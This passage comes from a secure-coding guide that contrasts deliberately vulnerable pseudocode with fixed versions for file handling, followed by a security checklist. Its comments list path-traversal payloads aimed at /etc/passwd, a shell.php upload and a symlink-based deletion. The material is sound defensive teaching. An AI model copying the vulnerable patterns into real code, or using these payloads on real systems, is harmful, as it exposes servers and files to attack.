file_record.mime_type + }) + CATCH StorageError as e: + log.error("File read failed", { + file_id: file_id, + storage_key: file_record.storage_key, + error: e.message + }) + RETURN APIError( + status=500, + code="INTERNAL_ERROR", + message="Unable to retrieve file" + ).to_response() + END TRY +END FUNCTION + +// Validation errors without revealing schema +FUNCTION validate_request(schema, data): + errors = [] + + FOR field, rules IN schema: + IF field NOT IN data AND rules.required: + errors.append({ + field: field, + message: "This field is required" + }) + ELSE IF field IN data: + value = data[field] + + // Type validation + IF NOT check_type(value, rules.type): + errors.append({ + field: field, + message: "Invalid value" // Don't say "expected integer" + }) + // Length validation + ELSE IF rules.max_length AND len(value) > rules.max_length: + errors.append({ + field: field, + message: "Value too long" + }) + END IF + END IF + END FOR + + IF errors.length > 0: + THROW ValidationError(errors) + END IF +END FUNCTION +``` + +--- + +## 10. File Handling + +**CWE References:** CWE-22 (Path Traversal), CWE-434 (Unrestricted Upload), CWE-377 (Insecure Temp File), CWE-59 (Symlink Following), CWE-732 (Incorrect Permission Assignment) +**Severity:** High to Critical | **Related:** [[File-Handling]] + +> **Risk:** File handling vulnerabilities enable attackers to read/write arbitrary files, execute malicious uploads, or escalate privileges through symlink attacks. AI-generated code frequently uses unsafe path concatenation and skips file validation entirely. 
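The unsafe path concatenation named in the risk note can be contrasted with a containment check in a real language. The following is a minimal Python sketch rather than a definitive implementation: `resolve_upload_path` and the `UPLOAD_DIR` value are hypothetical names chosen for illustration, and the check relies on `pathlib.Path.resolve` and `Path.is_relative_to` (Python 3.9+).

```python
from pathlib import Path

# Hypothetical base directory, used here only for illustration.
UPLOAD_DIR = Path("/var/app/uploads")


def resolve_upload_path(requested_name: str, base_dir: Path = UPLOAD_DIR) -> Path:
    """Return the resolved path for requested_name inside base_dir.

    Raises ValueError if the name is empty or resolves to base_dir itself
    or to anything outside it.
    """
    if not requested_name:
        raise ValueError("filename required")

    base = base_dir.resolve()
    # Joining with an absolute path discards base, so resolve first and
    # then test containment instead of trusting the join.
    candidate = (base / requested_name).resolve()

    if candidate == base or not candidate.is_relative_to(base):
        raise ValueError("path escapes upload directory")
    return candidate
```

Because the comparison happens after resolution, `..` segments and absolute paths are normalized before the containment test, which is why inputs such as `../../etc/passwd` and `/etc/passwd` are rejected without any string filtering.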
+ +### 10.1 Path Traversal Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Direct path concatenation allows traversal +// ======================================== +FUNCTION download_file_vulnerable(user_requested_filename): + // VULNERABLE: Attacker can request "../../etc/passwd" + file_path = "/var/app/uploads/" + user_requested_filename + + content = read_file(file_path) + RETURN content +END FUNCTION + +@route("/api/files/download") +FUNCTION handle_download_bad(request): + filename = request.query.filename + // No validation - attacker controls path + RETURN download_file_vulnerable(filename) +END FUNCTION + +// Attack examples: +// ?filename=../../etc/passwd -> reads /etc/passwd +// ?filename=....//....//etc/passwd -> bypasses simple ../ filters +// ?filename=..%2F..%2Fetc/passwd -> URL encoded traversal +// ?filename=/etc/passwd -> absolute path injection + +// ======================================== +// GOOD: Secure path handling with validation +// ======================================== +CONSTANT UPLOAD_DIR = "/var/app/uploads" + +FUNCTION download_file_secure(user_requested_filename): + // Step 1: Reject obviously malicious input + IF user_requested_filename IS NULL OR user_requested_filename == "": + THROW ValidationError("Filename required") + END IF + + // Step 2: Get only the base filename, reject path components + safe_filename = get_basename(user_requested_filename) + + // Step 3: Reject filenames that are empty after basename extraction + IF safe_filename == "" OR safe_filename == "." 
OR safe_filename == "..": + THROW ValidationError("Invalid filename") + END IF + + // Step 4: Build the full path + full_path = join_path(UPLOAD_DIR, safe_filename) + + // Step 5: Resolve to absolute path and verify it's within allowed directory + resolved_path = resolve_absolute_path(full_path) + + IF NOT resolved_path.starts_with(UPLOAD_DIR + "/"): + log.security("Path traversal attempt blocked", { + requested: user_requested_filename, + resolved: resolved_path + }) + THROW SecurityError("Access denied") + END IF + + // Step 6: Verify file exists and is a regular file (not directory/symlink) + IF NOT file_exists(resolved_path) OR NOT is_regular_file(resolved_path): + THROW NotFoundError("File not found") + END IF + + RETURN read_file(resolved_path) +END FUNCTION + +// Alternative: Use database lookups instead of filesystem paths +FUNCTION download_file_by_id(file_id): + // Validate file_id format (UUID) + IF NOT is_valid_uuid(file_id): + THROW ValidationError("Invalid file ID") + END IF + + // Look up file metadata in database + file_record = database.query( + "SELECT storage_path, original_name, owner_id FROM files WHERE id = ?", + [file_id] + ) + + IF file_record IS NULL: + THROW NotFoundError("File not found") + END IF + + // Verify ownership + IF file_record.owner_id != current_user.id: + THROW ForbiddenError("Access denied") + END IF + + // Storage path is server-controlled, not user input + RETURN read_file(file_record.storage_path) +END FUNCTION + +// Path validation helper +FUNCTION is_safe_path(base_dir, requested_path): + // Resolve both paths to absolute canonical form + base_resolved = resolve_canonical_path(base_dir) + full_resolved = resolve_canonical_path(join_path(base_dir, requested_path)) + + // Ensure resolved path is within base directory + RETURN full_resolved.starts_with(base_resolved + PATH_SEPARATOR) +END FUNCTION +``` + +### 10.2 Unrestricted File Uploads + +``` +// PSEUDOCODE - Implement in your target language + +// 
======================================== +// BAD: No validation on uploaded files +// ======================================== +@route("/api/upload") +FUNCTION upload_file_vulnerable(request): + uploaded_file = request.files.get("file") + + // VULNERABLE: Accepts any file type + filename = uploaded_file.filename + + // VULNERABLE: Uses user-provided filename directly + save_path = "/var/app/uploads/" + filename + + // VULNERABLE: No size limits + uploaded_file.save(save_path) + + // VULNERABLE: May be served with executable MIME type + RETURN {url: "/files/" + filename} +END FUNCTION + +// Attack scenarios: +// - Upload shell.php -> execute PHP code +// - Upload malicious.html -> stored XSS +// - Upload ../../../etc/cron.d/malicious -> write to system dirs +// - Upload huge file -> disk exhaustion DoS +// - Upload polyglot (valid image + embedded JS) -> bypass checks + +// ======================================== +// GOOD: Comprehensive upload validation +// ======================================== +CONSTANT ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "doc", "docx"} +CONSTANT ALLOWED_MIME_TYPES = { + "image/jpeg", "image/png", "image/gif", + "application/pdf", + "application/msword", + "application/vnd.openxmlformats-officedocument.wordprocessingml.document" +} +CONSTANT MAX_FILE_SIZE = 10 * 1024 * 1024 // 10 MB +CONSTANT UPLOAD_DIR = "/var/app/uploads" + +@route("/api/upload") +FUNCTION upload_file_secure(request): + uploaded_file = request.files.get("file") + + IF uploaded_file IS NULL: + RETURN error_response(400, "No file provided") + END IF + + // Step 1: Check file size BEFORE reading into memory + content_length = request.headers.get("Content-Length") + IF content_length IS NOT NULL AND int(content_length) > MAX_FILE_SIZE: + RETURN error_response(413, "File too large") + END IF + + // Step 2: Validate original filename extension + original_filename = uploaded_file.filename + extension = get_extension(original_filename).lower() + + IF extension 
NOT IN ALLOWED_EXTENSIONS: + log.warning("Rejected upload with extension", {extension: extension}) + RETURN error_response(400, "File type not allowed") + END IF + + // Step 3: Read file with size limit + file_content = uploaded_file.read(MAX_FILE_SIZE + 1) + + IF len(file_content) > MAX_FILE_SIZE: + RETURN error_response(413, "File too large") + END IF + + // Step 4: Validate MIME type from file content (magic bytes) + detected_mime = detect_mime_type(file_content) + + IF detected_mime NOT IN ALLOWED_MIME_TYPES: + log.warning("MIME type mismatch", { + claimed: uploaded_file.content_type, + detected: detected_mime + }) + RETURN error_response(400, "File type not allowed") + END IF + + // Step 5: For images, verify they parse correctly (anti-polyglot) + IF detected_mime.starts_with("image/"): + TRY: + image = parse_image(file_content) + // Re-encode to strip any embedded data + file_content = encode_image(image, format=extension) + CATCH ImageParseError: + RETURN error_response(400, "Invalid image file") + END TRY + END IF + + // Step 6: Generate random filename (never use user input) + random_name = generate_uuid() + "." 
+ extension + save_path = join_path(UPLOAD_DIR, random_name) + + // Step 7: Save with restrictive permissions (owner read/write only, no execute) + write_file(save_path, file_content, permissions=0o600) + + // Step 8: Store metadata in database + file_id = database.insert("files", { + id: generate_uuid(), + storage_name: random_name, + original_name: sanitize_filename(original_filename), + mime_type: detected_mime, + size: len(file_content), + owner_id: current_user.id, + uploaded_at: current_timestamp() + }) + + log.info("File uploaded", {file_id: file_id, size: len(file_content)}) + + RETURN { + file_id: file_id, + // Serve through controlled endpoint, not direct file access + url: "/api/files/" + file_id + } +END FUNCTION + +// Serve uploaded files safely +@route("/api/files/{file_id}") +FUNCTION serve_file_secure(request, file_id): + file_record = database.get_file(file_id) + + IF file_record IS NULL OR file_record.owner_id != current_user.id: + RETURN error_response(404, "File not found") + END IF + + file_path = join_path(UPLOAD_DIR, file_record.storage_name) + content = read_file(file_path) + + RETURN response(200, content, headers={ + // Force download so the browser never renders the file inline + "Content-Disposition": "attachment; filename=\"" + + sanitize_header(file_record.original_name) + "\"", + // Prevent MIME sniffing + "X-Content-Type-Options": "nosniff", + // Strict content type + "Content-Type": file_record.mime_type + }) +END FUNCTION +``` + +### 10.3 Missing File Type Validation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Extension-only or no validation +// ======================================== +FUNCTION validate_image_bad(filename, file_content): + // VULNERABLE: Only checks extension, easily spoofed + extension = get_extension(filename).lower() + + IF extension IN ["jpg", "jpeg", "png", "gif"]: + RETURN TRUE // Attacker renames malware.exe to malware.jpg + END IF + + RETURN FALSE +END FUNCTION + +FUNCTION 
validate_mime_header_bad(request): + // VULNERABLE: Only checks claimed MIME type header + mime = request.headers.get("Content-Type") + + IF mime.starts_with("image/"): + RETURN TRUE // Attacker sets Content-Type: image/png for shell.php + END IF + + RETURN FALSE +END FUNCTION + +// ======================================== +// GOOD: Multi-layer file type validation +// ======================================== + +// Magic bytes signatures for common file types +MAGIC_SIGNATURES = { + "jpg": [0xFF, 0xD8, 0xFF], + "png": [0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A], + "gif": [0x47, 0x49, 0x46, 0x38], // GIF8 + "pdf": [0x25, 0x50, 0x44, 0x46], // %PDF + "zip": [0x50, 0x4B, 0x03, 0x04], + "docx": [0x50, 0x4B, 0x03, 0x04], // DOCX is ZIP-based: same signature as "zip", so magic bytes alone cannot tell them apart +} + +FUNCTION validate_file_type(filename, file_content, allowed_types): + // Layer 1: Extension validation + extension = get_extension(filename).lower() + + IF extension NOT IN allowed_types: + RETURN {valid: FALSE, reason: "Extension not allowed"} + END IF + + // Layer 2: Magic bytes validation + detected_type = detect_type_by_magic(file_content) + + IF detected_type IS NULL: + RETURN {valid: FALSE, reason: "Unknown file type"} + END IF + + IF detected_type NOT IN allowed_types: + RETURN {valid: FALSE, reason: "Content type not allowed"} + END IF + + // Layer 3: Extension matches content + IF NOT extension_matches_content(extension, detected_type): + RETURN {valid: FALSE, reason: "Extension does not match content"} + END IF + + // Layer 4: For specific types, deep validation + IF detected_type IN ["jpg", "jpeg", "png", "gif"]: + IF NOT validate_image_structure(file_content): + RETURN {valid: FALSE, reason: "Invalid image structure"} + END IF + ELSE IF detected_type == "pdf": + IF NOT validate_pdf_safe(file_content): + RETURN {valid: FALSE, reason: "PDF contains unsafe content"} + END IF + ELSE IF detected_type IN ["docx", "xlsx"]: + IF NOT validate_office_safe(file_content): + RETURN {valid: FALSE, reason: "Document 
contains macros"} + END IF + END IF + + RETURN {valid: TRUE, detected_type: detected_type} +END FUNCTION + +FUNCTION detect_type_by_magic(file_content): + IF len(file_content) < 8: + RETURN NULL + END IF + + header = file_content[0:8] + + FOR type_name, signature IN MAGIC_SIGNATURES: + IF header.starts_with(bytes(signature)): + RETURN type_name + END IF + END FOR + + RETURN NULL +END FUNCTION + +FUNCTION validate_image_structure(file_content): + TRY: + // Use secure image library to parse + image = image_library.decode(file_content) + + // Check for reasonable dimensions (anti-DoS) + IF image.width > 10000 OR image.height > 10000: + RETURN FALSE + END IF + + // Check pixel count (decompression bomb protection) + IF image.width * image.height > 100000000: // 100 megapixels + RETURN FALSE + END IF + + RETURN TRUE + + CATCH ImageDecodeError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION validate_pdf_safe(file_content): + TRY: + pdf = pdf_library.parse(file_content) + + // Check for JavaScript (often used in attacks) + IF pdf.contains_javascript(): + RETURN FALSE + END IF + + // Check for embedded files + IF pdf.has_embedded_files(): + RETURN FALSE + END IF + + // Check for form actions pointing to URLs + IF pdf.has_external_actions(): + RETURN FALSE + END IF + + RETURN TRUE + + CATCH PDFParseError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION validate_office_safe(file_content): + TRY: + // Office files are ZIP archives + archive = zip_library.open(file_content) + + // Check for macro-enabled formats + FOR entry IN archive.entries(): + IF entry.name.contains("vbaProject") OR entry.name.ends_with(".bin"): + RETURN FALSE // Contains macros + END IF + END FOR + + RETURN TRUE + + CATCH ZipError: + RETURN FALSE + END TRY +END FUNCTION +``` + +### 10.4 Insecure Temporary File Handling + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Predictable or insecure temp files +// 
======================================== + +// Mistake 1: Predictable filename +FUNCTION create_temp_bad_predictable(data): + // VULNERABLE: Attacker can predict and pre-create file + temp_path = "/tmp/myapp_" + current_user.id + ".tmp" + + // Race condition: attacker creates symlink before this + write_file(temp_path, data) + + RETURN temp_path +END FUNCTION + +// Mistake 2: World-readable permissions +FUNCTION create_temp_bad_permissions(data): + temp_path = "/tmp/myapp_" + random_string(8) + ".tmp" + + // VULNERABLE: Default permissions may be world-readable (0644) + write_file(temp_path, data) // Other users can read + + RETURN temp_path +END FUNCTION + +// Mistake 3: Not cleaning up +FUNCTION process_upload_bad_cleanup(uploaded_data): + temp_path = "/tmp/upload_" + generate_uuid() + write_file(temp_path, uploaded_data) + + TRY: + result = process_file(temp_path) + // VULNERABLE: Temp file remains on disk if exception occurs elsewhere + RETURN result + CATCH Error as e: + // Temp file leaked! 
+ THROW e + END TRY +END FUNCTION + +// Mistake 4: Using system temp without isolation +FUNCTION create_temp_bad_shared(data): + // VULNERABLE: Shared /tmp can be accessed by other users/processes + temp_path = temp_directory() + "/" + random_string(8) + write_file(temp_path, data) + RETURN temp_path +END FUNCTION + +// ======================================== +// GOOD: Secure temporary file handling +// ======================================== + +// Use language's secure temp file creation +FUNCTION create_temp_secure(data, suffix=".tmp"): + // mkstemp equivalent: creates file with random name and 0600 permissions + temp_file = create_secure_temp_file( + prefix="myapp_", + suffix=suffix, + dir="/var/app/tmp" // App-specific temp directory + ) + + // Write data to already-open file handle (no race condition) + temp_file.write(data) + temp_file.flush() + + RETURN temp_file +END FUNCTION + +// Process with guaranteed cleanup +FUNCTION process_upload_secure(uploaded_data): + temp_file = NULL + + TRY: + // Create secure temp file + temp_file = create_secure_temp_file( + prefix="upload_", + suffix=get_safe_extension(uploaded_data.filename), + dir=APPLICATION_TEMP_DIR + ) + + // Write with explicit permissions + temp_file.write(uploaded_data.content) + temp_file.flush() + + // Process the file + result = process_file(temp_file.path) + + RETURN result + + FINALLY: + // Always clean up, even on exception + IF temp_file IS NOT NULL: + TRY: + temp_file.close() + delete_file(temp_file.path) + CATCH: + log.warning("Failed to clean up temp file", {path: temp_file.path}) + END TRY + END IF + END TRY +END FUNCTION + +// Context manager pattern for automatic cleanup +FUNCTION with_temp_file(data, callback): + temp_file = create_secure_temp_file(prefix="ctx_") + + TRY: + temp_file.write(data) + temp_file.flush() + + RETURN callback(temp_file.path) + + FINALLY: + temp_file.close() + secure_delete(temp_file.path) // Overwrite before delete for sensitive data + END TRY +END FUNCTION + 
+// Usage: +result = with_temp_file(sensitive_data, FUNCTION(path): + RETURN external_processor.process(path) +END FUNCTION) + +// Secure temp directory per-request +FUNCTION create_temp_directory_secure(): + // Create directory with random name and 0700 permissions + temp_dir = create_secure_temp_directory( + prefix="session_", + dir=APPLICATION_TEMP_DIR + ) + + // Set restrictive permissions + set_permissions(temp_dir, 0o700) + + RETURN temp_dir +END FUNCTION + +// Application startup: ensure temp directory security +FUNCTION initialize_temp_directory(): + temp_dir = APPLICATION_TEMP_DIR + + // Create if doesn't exist + IF NOT directory_exists(temp_dir): + create_directory(temp_dir, permissions=0o700) + END IF + + // Verify permissions + current_perms = get_permissions(temp_dir) + IF current_perms != 0o700: + set_permissions(temp_dir, 0o700) + END IF + + // Verify ownership + IF get_owner(temp_dir) != get_current_user(): + THROW SecurityError("Temp directory has incorrect ownership") + END IF + + // Clean up old temp files on startup + cleanup_old_temp_files(temp_dir, max_age_hours=24) +END FUNCTION + +// Secure delete for sensitive data +FUNCTION secure_delete(file_path): + IF file_exists(file_path): + // Overwrite with random data before deletion + file_size = get_file_size(file_path) + random_data = crypto.random_bytes(file_size) + write_file(file_path, random_data) + sync_to_disk(file_path) + + // Now delete + delete_file(file_path) + END IF +END FUNCTION +``` + +### 10.5 Symlink Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Following symlinks without validation +// ======================================== +FUNCTION read_user_file_vulnerable(user_id, filename): + user_dir = "/var/app/users/" + user_id + file_path = user_dir + "/" + filename + + // VULNERABLE: If filename is symlink to /etc/passwd, reads it + IF file_exists(file_path): + RETURN read_file(file_path) + END IF + + 
RETURN NULL +END FUNCTION + +FUNCTION delete_file_vulnerable(user_id, filename): + user_dir = "/var/app/users/" + user_id + file_path = user_dir + "/" + filename + + // VULNERABLE: Attacker plants a symlinked directory inside user_dir + // Symlink: /var/app/users/123/data -> /etc, filename = "data/passwd" + // The path resolves through the symlink and deletes /etc/passwd + delete_file(file_path) +END FUNCTION + +// TOCTOU (Time of Check to Time of Use) vulnerability +FUNCTION process_file_toctou(file_path): + // Check if file is safe + IF is_symlink(file_path): + THROW SecurityError("Symlinks not allowed") + END IF + + // VULNERABLE: Race condition between check and use + // Attacker replaces regular file with symlink here + + // Process the file (now following attacker's symlink) + content = read_file(file_path) + RETURN process_content(content) +END FUNCTION + +// ======================================== +// GOOD: Safe symlink handling +// ======================================== + +// Option 1: Reject symlinks entirely +FUNCTION read_user_file_no_symlinks(user_id, filename): + user_dir = "/var/app/users/" + user_id + + // Validate filename + IF NOT is_safe_filename(filename): + THROW ValidationError("Invalid filename") + END IF + + file_path = join_path(user_dir, filename) + + // Use lstat to check WITHOUT following symlinks + file_stat = lstat(file_path) // NOT stat() + + IF file_stat IS NULL: + THROW NotFoundError("File not found") + END IF + + // Reject if symlink + IF file_stat.is_symlink: + log.security("Symlink access blocked", {path: file_path}) + THROW SecurityError("Access denied") + END IF + + // Reject if not regular file + IF NOT file_stat.is_regular_file: + THROW ValidationError("Not a regular file") + END IF + + // Use O_NOFOLLOW flag when opening + file_handle = open_file(file_path, flags=O_RDONLY | O_NOFOLLOW) + content = file_handle.read() + file_handle.close() + + RETURN content +END FUNCTION + +// Option 2: Resolve and validate path before access +FUNCTION 
read_file_resolved(base_dir, relative_path): + // Get the real path resolving all symlinks + requested_path = join_path(base_dir, relative_path) + real_path = realpath(requested_path) + + // Verify real path is within allowed base directory + real_base = realpath(base_dir) + + IF NOT real_path.starts_with(real_base + "/"): + log.security("Path escape via symlink", { + requested: requested_path, + resolved: real_path, + base: real_base + }) + THROW SecurityError("Access denied") + END IF + + RETURN read_file(real_path) +END FUNCTION + +// Option 3: Atomic operations to prevent TOCTOU +FUNCTION process_file_atomic(file_path): + // Open with O_NOFOLLOW - fails if symlink + TRY: + file_handle = open_file(file_path, flags=O_RDONLY | O_NOFOLLOW) + CATCH SymlinkError: + THROW SecurityError("Symlinks not allowed") + END TRY + + // fstat the open handle, not the path (prevents TOCTOU) + file_stat = fstat(file_handle) + + // Verify it's still a regular file + IF NOT file_stat.is_regular_file: + file_handle.close() + THROW ValidationError("Not a regular file") + END IF + + // Read from the verified handle + content = file_handle.read() + file_handle.close() + + RETURN process_content(content) +END FUNCTION + +// Safe file writing with symlink protection +FUNCTION write_file_safe(directory, filename, content): + // Validate filename + IF NOT is_safe_filename(filename): + THROW ValidationError("Invalid filename") + END IF + + file_path = join_path(directory, filename) + + // Check if path already exists + existing_stat = lstat(file_path) + + IF existing_stat IS NOT NULL: + IF existing_stat.is_symlink: + THROW SecurityError("Cannot overwrite symlink") + END IF + END IF + + // Open with O_CREAT | O_EXCL to fail if exists (then retry with O_TRUNC) + // Or use O_NOFOLLOW if supported for writing + TRY: + // Write to temp file first, then atomic rename + temp_path = join_path(directory, "." 
+ generate_uuid() + ".tmp") + + file_handle = open_file(temp_path, + flags=O_WRONLY | O_CREAT | O_EXCL, + permissions=0o644 + ) + file_handle.write(content) + file_handle.flush() + file_handle.close() + + // Atomic rename (on same filesystem) + rename_file(temp_path, file_path) + + CATCH FileExistsError: + // Handle race condition + THROW ConcurrencyError("File creation conflict") + END TRY +END FUNCTION + +// Directory traversal with symlink safety +FUNCTION list_directory_safe(dir_path): + real_dir = realpath(dir_path) + entries = [] + + FOR entry IN list_directory(real_dir): + entry_path = join_path(real_dir, entry.name) + entry_stat = lstat(entry_path) // Don't follow symlinks + + entry_info = { + name: entry.name, + is_file: entry_stat.is_regular_file, + is_dir: entry_stat.is_directory, + is_symlink: entry_stat.is_symlink, + size: entry_stat.size IF entry_stat.is_regular_file ELSE 0 + } + + // Optionally resolve symlink target for display + IF entry_stat.is_symlink: + entry_info.symlink_target = readlink(entry_path) + // Check if symlink points outside directory + real_target = realpath(entry_path) + entry_info.safe = real_target.starts_with(real_dir + "/") + END IF + + entries.append(entry_info) + END FOR + + RETURN entries +END FUNCTION +``` + +### 10.6 Unsafe File Permissions + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Overly permissive file permissions +// ======================================== + +// Mistake 1: World-readable sensitive files +FUNCTION save_config_bad(config_data): + // VULNERABLE: Default umask may create 0644 (world-readable) + write_file("/etc/myapp/config.json", json_encode(config_data)) + // Config contains database passwords, API keys, etc. 
+END FUNCTION + +// Mistake 2: World-writable files +FUNCTION create_log_bad(): + log_path = "/var/log/myapp/app.log" + + // VULNERABLE: 0666 allows any user to modify logs + write_file(log_path, "", permissions=0o666) +END FUNCTION + +// Mistake 3: Executable when shouldn't be +FUNCTION save_upload_bad(content, filename): + path = "/var/app/uploads/" + filename + + // VULNERABLE: 0755 makes file executable + write_file(path, content, permissions=0o755) + // Attacker uploads shell script and executes it +END FUNCTION + +// Mistake 4: Directory permissions too open +FUNCTION create_user_dir_bad(user_id): + dir_path = "/var/app/users/" + user_id + + // VULNERABLE: 0777 allows anyone to read/write/traverse + create_directory(dir_path, permissions=0o777) +END FUNCTION + +// Mistake 5: Not checking permissions on read +FUNCTION load_config_bad(): + config_path = "/etc/myapp/secrets.json" + + // VULNERABLE: Loads config without verifying it hasn't been tampered + RETURN json_decode(read_file(config_path)) +END FUNCTION + +// ======================================== +// GOOD: Secure file permissions +// ======================================== + +// Permission constants +CONSTANT PERM_OWNER_ONLY = 0o600 // -rw------- +CONSTANT PERM_OWNER_READ_ONLY = 0o400 // -r-------- +CONSTANT PERM_STANDARD_FILE = 0o644 // -rw-r--r-- +CONSTANT PERM_PRIVATE_DIR = 0o700 // drwx------ +CONSTANT PERM_STANDARD_DIR = 0o755 // drwxr-xr-x + +FUNCTION save_sensitive_config(config_data): + config_path = "/etc/myapp/secrets.json" + + // Set restrictive umask for this operation + old_umask = set_umask(0o077) + + TRY: + // Write to temp file first + temp_path = config_path + ".tmp" + write_file(temp_path, json_encode(config_data)) + + // Explicitly set permissions (don't rely on umask) + set_permissions(temp_path, PERM_OWNER_ONLY) + + // Set ownership to service account + set_owner(temp_path, "myapp", "myapp") + + // Atomic rename + rename_file(temp_path, config_path) + + FINALLY: + // Restore umask 
+ set_umask(old_umask) + END TRY +END FUNCTION + +FUNCTION create_log_secure(): + log_dir = "/var/log/myapp" + log_path = log_dir + "/app.log" + + // Ensure directory exists with correct permissions + IF NOT directory_exists(log_dir): + create_directory(log_dir, permissions=PERM_STANDARD_DIR) + set_owner(log_dir, "myapp", "myapp") + END IF + + // Create log file with appropriate permissions + // 0640 = owner read/write, group read, others none + IF NOT file_exists(log_path): + write_file(log_path, "", permissions=0o640) + set_owner(log_path, "myapp", "adm") // adm group can read logs + END IF +END FUNCTION + +FUNCTION save_upload_secure(content, filename, user_id): + uploads_dir = "/var/app/uploads" + user_dir = join_path(uploads_dir, user_id) + + // Ensure user directory exists + IF NOT directory_exists(user_dir): + create_directory(user_dir, permissions=PERM_PRIVATE_DIR) + END IF + + // Generate safe filename + safe_name = generate_uuid() + get_safe_extension(filename) + file_path = join_path(user_dir, safe_name) + + // Save with NO execute permission, owner read/write only + write_file(file_path, content, permissions=PERM_OWNER_ONLY) + + RETURN file_path +END FUNCTION + +FUNCTION load_config_secure(config_path): + // Verify file exists + IF NOT file_exists(config_path): + THROW ConfigError("Config file not found") + END IF + + // Check permissions before loading + file_stat = stat(config_path) + + // Reject if world-readable or world-writable + IF file_stat.mode & 0o004: // World readable + THROW SecurityError("Config file is world-readable") + END IF + + IF file_stat.mode & 0o002: // World writable + THROW SecurityError("Config file is world-writable") + END IF + + // Verify ownership + expected_owner = get_service_user() + IF file_stat.owner != expected_owner: + THROW SecurityError("Config file has incorrect ownership") + END IF + + // Safe to load + RETURN json_decode(read_file(config_path)) +END FUNCTION + +// Verify and fix permissions on startup +FUNCTION 
verify_file_permissions(): + critical_files = [ + {path: "/etc/myapp/secrets.json", expected: 0o600, type: "file"}, + {path: "/etc/myapp", expected: 0o700, type: "directory"}, + {path: "/var/app/private", expected: 0o700, type: "directory"}, + {path: "/var/app/uploads", expected: 0o755, type: "directory"} + ] + + FOR item IN critical_files: + IF NOT exists(item.path): + log.warning("Missing path", {path: item.path}) + CONTINUE + END IF + + current_stat = stat(item.path) + current_mode = current_stat.mode & 0o777 // Permission bits only + + IF current_mode != item.expected: + log.warning("Fixing permissions", { + path: item.path, + current: format_octal(current_mode), + expected: format_octal(item.expected) + }) + set_permissions(item.path, item.expected) + END IF + + // Check for world-writable (uses the mode observed before any fix above) + IF current_mode & 0o002: + log.error("World-writable file detected", {path: item.path}) + THROW SecurityError("Critical file is world-writable: " + item.path) + END IF + END FOR + + log.info("File permissions verified") +END FUNCTION + +// Secure file copy +FUNCTION copy_file_secure(source, destination, preserve_permissions=FALSE): + // Inspect source with lstat: stat() follows symlinks and would never report one + source_stat = lstat(source) + + IF source_stat.is_symlink: + THROW SecurityError("Cannot copy symlinks") + END IF + + content = read_file(source) + + // Determine permissions for destination + IF preserve_permissions: + dest_perms = source_stat.mode & 0o777 + // But never preserve world-writable + dest_perms = dest_perms & ~0o002 + ELSE: + // Default to secure permissions + dest_perms = PERM_OWNER_ONLY + END IF + + // Write with explicit permissions + write_file(destination, content, permissions=dest_perms) +END FUNCTION +``` + +--- + +## Pre-Generation Security Checklist + +**Before generating ANY code, verify these critical security requirements:** + +### ✓ Secrets & Credentials +- [ ] No hardcoded API keys, passwords, tokens, or secrets +- [ ] Credentials loaded from environment variables or secret managers +- [ ] No secrets 
in client-side/frontend code +- [ ] Git history checked for accidentally committed secrets + +### ✓ Input Handling +- [ ] All user input validated on the SERVER side +- [ ] Input type, length, and format constraints enforced +- [ ] Database queries use parameterized/prepared statements +- [ ] Shell commands use argument arrays, not string concatenation +- [ ] File paths validated and canonicalized before use + +### ✓ Output Encoding +- [ ] HTML output properly encoded to prevent XSS +- [ ] Context-appropriate encoding (HTML, URL, JS, CSS) +- [ ] Content-Security-Policy header configured +- [ ] Error messages don't expose internal details + +### ✓ Authentication & Sessions +- [ ] Passwords hashed with bcrypt/Argon2 (not MD5/SHA1) +- [ ] Session tokens generated with cryptographically secure randomness +- [ ] Session IDs regenerated on authentication state changes +- [ ] Rate limiting on authentication endpoints +- [ ] JWT tokens use strong secrets and explicit algorithms + +### ✓ Cryptography +- [ ] Modern algorithms only (AES-GCM, ChaCha20-Poly1305) +- [ ] Keys from environment/secret manager, not hardcoded +- [ ] Unique IVs/nonces for each encryption operation +- [ ] Key derivation uses PBKDF2/Argon2/scrypt + +### ✓ File Operations +- [ ] File uploads validate extension, MIME type, and magic bytes +- [ ] File size limits enforced +- [ ] Uploaded files stored outside web root +- [ ] Path traversal prevented with basename + realpath validation +- [ ] Temp files use mkstemp with restrictive permissions + +### ✓ API Security +- [ ] All endpoints require authentication (unless explicitly public) +- [ ] Object-level authorization verified (ownership checks) +- [ ] Response DTOs with explicit field allowlists +- [ ] Rate limiting applied to prevent abuse +- [ ] Error responses use standard format without internal details + +### ✓ Dependencies +- [ ] Package names verified to exist before importing +- [ ] Dependencies pinned to exact versions with lockfiles +- [ ] No 
packages with known vulnerabilities +- [ ] Transitive dependencies reviewed + +### ✓ Configuration +- [ ] Debug mode disabled in production +- [ ] Default credentials replaced with strong values +- [ ] Security headers configured (CSP, HSTS, X-Frame-Options) +- [ ] CORS restricted to known origins +- [ ] Admin interfaces protected with additional authentication + +--- + +## External References + +### OWASP Resources +- **OWASP Top 10 (2021):** https://owasp.org/Top10/ +- **OWASP ASVS:** https://owasp.org/www-project-application-security-verification-standard/ +- **OWASP Cheat Sheet Series:** https://cheatsheetseries.owasp.org/ +- **OWASP Testing Guide:** https://owasp.org/www-project-web-security-testing-guide/ + +### CWE (Common Weakness Enumeration) +- **CWE Database:** https://cwe.mitre.org/ +- **CWE Top 25 (2024):** https://cwe.mitre.org/top25/archive/2024/2024_cwe_top25.html + +### CWE References in This Document +| CWE ID | Name | Sections | +|--------|------|----------| +| CWE-16 | Configuration | 7.5 | +| CWE-20 | Improper Input Validation | 6.1-6.6 | +| CWE-22 | Path Traversal | 6.6, 10.1 | +| CWE-59 | Symlink Following | 10.5 | +| CWE-78 | OS Command Injection | 2.2 | +| CWE-79 | Cross-site Scripting (XSS) | 3.1-3.5 | +| CWE-80 | Basic XSS | 3.1-3.5 | +| CWE-89 | SQL Injection | 2.1 | +| CWE-90 | LDAP Injection | 2.3 | +| CWE-117 | Log Injection | Quick Reference | +| CWE-180 | Incorrect Canonicalization | 6.6 | +| CWE-200 | Information 